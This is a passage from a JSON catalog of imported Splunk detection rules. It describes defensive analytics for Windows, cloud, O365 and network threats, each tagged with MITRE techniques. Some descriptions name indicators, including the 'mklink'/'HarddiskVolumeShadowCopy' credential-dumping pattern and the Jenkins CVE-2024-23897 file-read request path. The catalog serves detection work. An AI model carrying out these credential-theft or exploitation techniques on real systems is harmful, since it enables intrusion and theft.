"source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_invoke_model_access_denied.yml" } }, { "id": "splunk-security-content-c54b7439-cfb1-44c3-bb35-b0409553077c", "type": "detection", "name": "Windows Impair Defense Configure App Install Control", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender SmartScreen App Install Control feature. It leverages data from the Endpoint.Registry data model to identify changes to specific registry values. This activity is significant because disabling App Install Control can allow users to install potentially malicious web-based applications without restrictions, increasing the risk of security vulnerabilities. If confirmed malicious, this action could lead to the installation of harmful applications, potentially compromising the system and exposing sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-configure-app-install-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c54b7439-cfb1-44c3-bb35-b0409553077c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_configure_app_install_control.yml" } }, { "id": "splunk-security-content-c5a31f80-5888-4d81-9f78-1cc65026316e", "type": "detection", "name": "GetAdComputer with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-AdComputer` commandlet, which is used to discover remote systems within a domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it indicates potential reconnaissance efforts by adversaries to map out domain computers, which is a common step in the attack lifecycle. If confirmed malicious, this behavior could allow attackers to gain situational awareness and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadcomputer-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5a31f80-5888-4d81-9f78-1cc65026316e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadcomputer_with_powershell.yml" } }, { "id": "splunk-security-content-c5c622e4-d073-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect Windows DNS SIGRed via Zeek", "description": "The following analytic detects the presence of SIGRed, a critical DNS vulnerability, using Zeek DNS and Zeek Conn data. It identifies specific DNS query types (SIG and KEY) and checks for high data transfer within a flow. This detection is significant because SIGRed allows attackers to execute remote code on Windows DNS servers, potentially leading to unauthorized access and control. If confirmed malicious, this activity could result in data exfiltration, service disruption, or further network compromise. Immediate investigation and mitigation, such as patching or isolating the affected server, are crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-windows-dns-sigred-via-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5c622e4-d073-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_windows_dns_sigred_via_zeek.yml" } }, { "id": "splunk-security-content-c5c8e0f3-147a-43da-bf04-4cfaec27dc44", "type": "detection", "name": "Windows Group Discovery Via Net", "description": "The following analytic identifies the execution of `net.exe` with command-line arguments used to query global, local and domain groups. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate local or domain groups, which is a common step in Active Directory or privileged accounts discovery. If confirmed malicious, this behavior could allow attackers to gain insights into the domain structure, aiding in further attacks such as privilege escalation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-group-discovery-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5c8e0f3-147a-43da-bf04-4cfaec27dc44", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_group_discovery_via_net.yml" } }, { "id": "splunk-security-content-c5eac648-fae0-4263-91a6-773df1f4c903", "type": "detection", "name": "Credential Dumping via Symlink to Shadow Copy", "description": "The following analytic detects the creation of a symlink to a shadow copy, which may indicate credential dumping attempts. It leverages the Endpoint.Processes data model in Splunk to identify processes executing commands containing \"mklink\" and \"HarddiskVolumeShadowCopy\". This activity is significant because attackers often use this technique to manipulate or delete shadow copies, hindering system backup and recovery efforts. If confirmed malicious, this could prevent data restoration, complicate incident response, and lead to data loss or compromise. Analysts should review the process details, user, parent process, and any related artifacts to identify the attack source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/credential-dumping-via-symlink-to-shadow-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c5eac648-fae0-4263-91a6-773df1f4c903", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml" } }, { "id": "splunk-security-content-c6149154-c9d8-11eb-9da7-acde48001122", "type": "detection", "name": "Windows Registry Modification for Safe Mode Persistence", "description": "The following analytic identifies modifications to the SafeBoot registry keys, specifically within the Minimal and Network paths. This detection leverages registry activity logs from endpoint data sources like Sysmon or EDR tools. Monitoring these keys is crucial as adversaries can use them to persist drivers or services in Safe Mode, with Network allowing network connections. If confirmed malicious, this activity could enable attackers to maintain persistence even in Safe Mode, potentially bypassing certain security measures and facilitating further malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-modification-for-safe-mode-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6149154-c9d8-11eb-9da7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml" } }, { "id": "splunk-security-content-c641260d-2b48-4eb1-b1e8-2cc5b8b99ab1", "type": "detection", "name": "Jenkins Arbitrary File Read CVE-2024-23897", "description": "The following analytic identifies attempts to exploit Jenkins Arbitrary File Read CVE-2024-23897. It detects HTTP POST requests to Jenkins URLs containing \"*/cli?remoting=false*\" with a 200 status code. This activity is significant as it indicates potential unauthorized access to sensitive files on the Jenkins server, such as credentials and private keys. If confirmed malicious, this could lead to severe data breaches, unauthorized access, and further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jenkins-arbitrary-file-read-cve-2024-23897.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c641260d-2b48-4eb1-b1e8-2cc5b8b99ab1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/jenkins_arbitrary_file_read_cve_2024_23897.yml" } }, { "id": "splunk-security-content-c6998a30-fef4-4e89-97ac-3bb0123719b4", "type": "detection", "name": "O365 Email Access By Security Administrator", "description": "The following analytic identifies when a user with sufficient access to O365 Security & Compliance portal uses premium investigation features (Threat Explorer) to directly view email. Adversaries may exploit privileged access with this premium feature to enumerate or exfiltrate sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002", "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-access-by-security-administrator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6998a30-fef4-4e89-97ac-3bb0123719b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_access_by_security_administrator.yml" } }, { "id": "splunk-security-content-c6b2d80f-179a-41a1-b95e-ce5601d7427a", "type": "detection", "name": "Windows Registry Payload Injection", "description": "The following analytic detects suspiciously long data written to the Windows registry, a behavior often linked to fileless malware or persistence techniques. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on registry events with data lengths exceeding 512 characters. This activity is significant as it can indicate an attempt to evade traditional file-based defenses, making it crucial for SOC monitoring. If confirmed malicious, this technique could allow attackers to maintain persistence, execute code, or manipulate system configurations without leaving a conventional file footprint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-payload-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6b2d80f-179a-41a1-b95e-ce5601d7427a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_payload_injection.yml" } }, { "id": "splunk-security-content-c6db35af-8a0e-4b61-88ed-738e66f15715", "type": "detection", "name": "Cisco NVM - Non-Network Binary Making Network Connection", "description": "This analytic detects network connections initiated by binaries that are not typically associated with network communication,\nsuch as 'notepad.exe', 'calc.exe' or 'write.exe'.\nIt leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path, and parent process information.\nThese applications are normally used for locally and do not require outbound network access. When they do initiate such connections, it may indicate process hollowing, code injection, or proxy execution, where adversaries abuse a trusted process to mask malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-non-network-binary-making-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6db35af-8a0e-4b61-88ed-738e66f15715", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___non_network_binary_making_network_connection.yml" } }, { "id": "splunk-security-content-c6ddbf53-9715-49f3-bb4c-fb2e8a309cda", "type": "detection", "name": "Cloud Compute Instance Created With Previously Unseen Instance Type", "description": "The following analytic detects the creation of EC2 instances with previously unseen instance types.\nIt leverages Splunk's tstats command to analyze data from the Change data model, identifying instance types that have not been previously recorded.\nThis activity is significant for a SOC because it may indicate unauthorized or suspicious activity, such as an attacker attempting to create instances for malicious purposes.\nIf confirmed malicious, this could lead to unauthorized access, data exfiltration, system compromise, or service disruption. Immediate investigation is required to determine the legitimacy of the instance creation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-compute-instance-created-with-previously-unseen-instance-type.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6ddbf53-9715-49f3-bb4c-fb2e8a309cda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml" } }, { "id": "splunk-security-content-c6e24183-a5f4-4b2a-ad01-2eb456d09b67", "type": "detection", "name": "Windows AD Replication Service Traffic", "description": "The following analytic identifies unexpected Active Directory replication traffic from non-domain controller sources. It leverages data from the Network Traffic datamodel, specifically looking for applications related to AD replication. This activity is significant because AD replication traffic should typically only occur between domain controllers. Detection of such traffic from other sources may indicate malicious activities like DCSync or DCShadow, which are used for credential dumping. If confirmed malicious, this could allow attackers to exfiltrate sensitive credentials, leading to unauthorized access and potential domain-wide compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006", "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-replication-service-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c6e24183-a5f4-4b2a-ad01-2eb456d09b67", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_ad_replication_service_traffic.yml" } }, { "id": "splunk-security-content-c7495048-61b6-11ec-9a37-acde48001122", "type": "detection", "name": "Linux Service File Created In Systemd Directory", "description": "The following analytic detects the creation of suspicious service files within the systemd directories on Linux platforms. It leverages logs containing file name, file path, and process GUID data from endpoints. This activity is significant for a SOC as it may indicate an adversary attempting to establish persistence on a compromised host. If confirmed malicious, this could lead to system compromise or data exfiltration, allowing attackers to maintain control over the system and execute further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-service-file-created-in-systemd-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c7495048-61b6-11ec-9a37-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_service_file_created_in_systemd_directory.yml" } }, { "id": "splunk-security-content-c76b796c-27e1-4520-91c4-4a58695c749e", "type": "detection", "name": "Windows Files and Dirs Access Rights Modification Via Icacls", "description": "The following analytic identifies the modification of security permissions\non files or directories using tools like icacls.exe, cacls.exe, or xcacls.exe. It\nleverages data from Endpoint Detection and Response (EDR) agents, focusing on specific\ncommand-line executions. This activity is significant as it is commonly used by\nAdvanced Persistent Threats (APTs) and coinminer scripts to evade detection and\nmaintain control over compromised systems. If confirmed malicious, this behavior\ncould allow attackers to hinder investigation, impede remediation efforts, and maintain\npersistent access to the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-files-and-dirs-access-rights-modification-via-icacls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c76b796c-27e1-4520-91c4-4a58695c749e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_files_and_dirs_access_rights_modification_via_icacls.yml" } }, { "id": "splunk-security-content-c77162d3-f93c-45cc-80c8-22f6a4264e7f", "type": "detection", "name": "Unusually Long Command Line", "description": "The following analytic detects unusually long command lines, which may indicate malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on the length of command lines executed on hosts. This behavior is significant because attackers often use obfuscated or complex command lines to evade detection and execute malicious payloads. If confirmed malicious, this activity could lead to data theft, ransomware deployment, or further system compromise. Analysts should investigate the source and content of the command line, inspect relevant artifacts, and review concurrent processes to identify potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unusually-long-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c77162d3-f93c-45cc-80c8-22f6a4264e7f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unusually_long_command_line.yml" } }, { "id": "splunk-security-content-c783dd98-c703-4252-9e8a-f19d9f5c949e", "type": "detection", "name": "O365 Disable MFA", "description": "The following analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. It leverages O365 audit logs, specifically focusing on events related to MFA settings. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. If confirmed malicious, this activity could indicate an attacker attempting to maintain persistence or an insider threat, significantly increasing the risk of unauthorized access. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-disable-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c783dd98-c703-4252-9e8a-f19d9f5c949e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_disable_mfa.yml" } }, { "id": "splunk-security-content-c783dd98-c703-4252-9e8a-f19d9f66949e", "type": "detection", "name": "O365 Bypass MFA via Trusted IP", "description": "The following analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. It leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. This activity is significant because adding trusted IPs can weaken the security posture by bypassing MFA, which is a critical security control. If confirmed malicious, this could lead to unauthorized access, compromising sensitive information and systems. Immediate investigation is required to validate the legitimacy of the IP addition.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-bypass-mfa-via-trusted-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c783dd98-c703-4252-9e8a-f19d9f66949e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_bypass_mfa_via_trusted_ip.yml" } }, { "id": "splunk-security-content-c79c164f-4b21-4847-98f9-cf6a9f49179e", "type": "detection", "name": "AWS Detect Users creating keys with encrypt policy without MFA", "description": "The following analytic detects the creation of AWS KMS keys with an encryption policy accessible to everyone, including external entities. It leverages AWS CloudTrail logs to identify `CreateKey` or `PutKeyPolicy` events where the `kms:Encrypt` action is granted to all principals. This activity is significant as it may indicate a compromised account, allowing an attacker to misuse the encryption key to target other organizations. If confirmed malicious, this could lead to unauthorized data encryption, potentially disrupting operations and compromising sensitive information across multiple entities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-detect-users-creating-keys-with-encrypt-policy-without-mfa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c79c164f-4b21-4847-98f9-cf6a9f49179e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_detect_users_creating_keys_with_encrypt_policy_without_mfa.yml" } }, { "id": "splunk-security-content-c7fe0949-348a-41ce-8f17-a09a7fe5fd7d", "type": "detection", "name": "O365 Email Hard Delete Excessive Volume", "description": "The following analytic identifies when an O365 email account hard deletes an excessive number of emails within a short period (within 1 hour). This behavior may indicate a compromised account where the threat actor is attempting to permanently purge a large amount of items from the mailbox. Threat actors may attempt to remove evidence of their activity by purging items from the compromised mailbox. --- Some account owner legitimate behaviors can trigger this alert, however these actions may not be aligned with organizational expectations / best practice behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-hard-delete-excessive-volume.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c7fe0949-348a-41ce-8f17-a09a7fe5fd7d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_hard_delete_excessive_volume.yml" } }, { "id": "splunk-security-content-c8119b2f-d7f7-40be-940a-1c582870e8e2", "type": "detection", "name": "Kubernetes Previously Unseen Process", "description": "The following analytic detects previously unseen processes within the Kubernetes environment on master or worker nodes. It leverages process metrics collected via an OTEL collector and hostmetrics receiver, and data is pulled from Splunk Observability Cloud. This detection compares processes observed in the last hour against those seen in the previous 30 days. Identifying new processes is crucial as they may indicate unauthorized activity or attempts to compromise the node. If confirmed malicious, these processes could lead to data exfiltration, privilege escalation, denial-of-service attacks, or the introduction of malware, posing significant risks to the Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-previously-unseen-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8119b2f-d7f7-40be-940a-1c582870e8e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_previously_unseen_process.yml" } }, { "id": "splunk-security-content-c8127f87-c7c9-4036-89ed-8fe4b30e678c", "type": "detection", "name": "Windows Remote Service Rdpwinst Tool Execution", "description": "The following analytic detects the execution of the RDPWInst.exe tool, which is an RDP wrapper library used to enable remote desktop host support and concurrent RDP sessions. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, original file names, and specific command-line arguments. This activity is significant because adversaries can abuse this tool to establish unauthorized RDP connections, facilitating remote access and potential lateral movement within the network. If confirmed malicious, this could lead to unauthorized access, data exfiltration, and further compromise of the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-service-rdpwinst-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8127f87-c7c9-4036-89ed-8fe4b30e678c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml" } }, { "id": "splunk-security-content-c82adbc6-9f00-11ec-a81f-acde48001122", "type": "detection", "name": "Windows Disable Lock Workstation Feature Through Registry", "description": "The following analytic detects a suspicious registry modification that disables the Lock Computer feature in Windows. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation\" with a value of \"0x00000001\". This activity is significant because it prevents users from locking their screens, a tactic often used by malware, including ransomware, to maintain control over compromised systems. If confirmed malicious, this could allow attackers to sustain their presence and execute further malicious actions without user interruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-lock-workstation-feature-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c82adbc6-9f00-11ec-a81f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_lock_workstation_feature_through_registry.yml" } }, { "id": "splunk-security-content-c8640777-469f-4638-ab44-c34a3233ffac", "type": "detection", "name": "Windows Get-AdComputer Unconstrained Delegation Discovery", "description": "The following analytic detects the use of the Get-ADComputer cmdlet with parameters indicating a search for Windows endpoints with Kerberos Unconstrained Delegation. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this specific activity. This behavior is significant as it may indicate an attempt by adversaries or Red Teams to gain situational awareness and perform Active Directory discovery. If confirmed malicious, this activity could allow attackers to identify high-value targets for further exploitation, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-get-adcomputer-unconstrained-delegation-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c8640777-469f-4638-ab44-c34a3233ffac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_get_adcomputer_unconstrained_delegation_discovery.yml" } }, { "id": "splunk-security-content-c8a6b56d-16dd-4e9c-b4bd-527742ead98d", "type": "detection", "name": "High Volume of Bytes Out to Url", "description": "The following analytic detects a high volume of outbound web traffic, specifically over 1GB of data sent to a URL within a 2-minute window. It leverages the Web data model to identify significant uploads by analyzing the sum of bytes out. This activity is significant as it may indicate potential data exfiltration by malware or malicious insiders. If confirmed as malicious, this behavior could lead to unauthorized data transfer, resulting in data breaches and loss of sensitive information. Immediate investigation is required to determine the legitimacy of the transfer and mitigate any potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-volume-of-bytes-out-to-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": 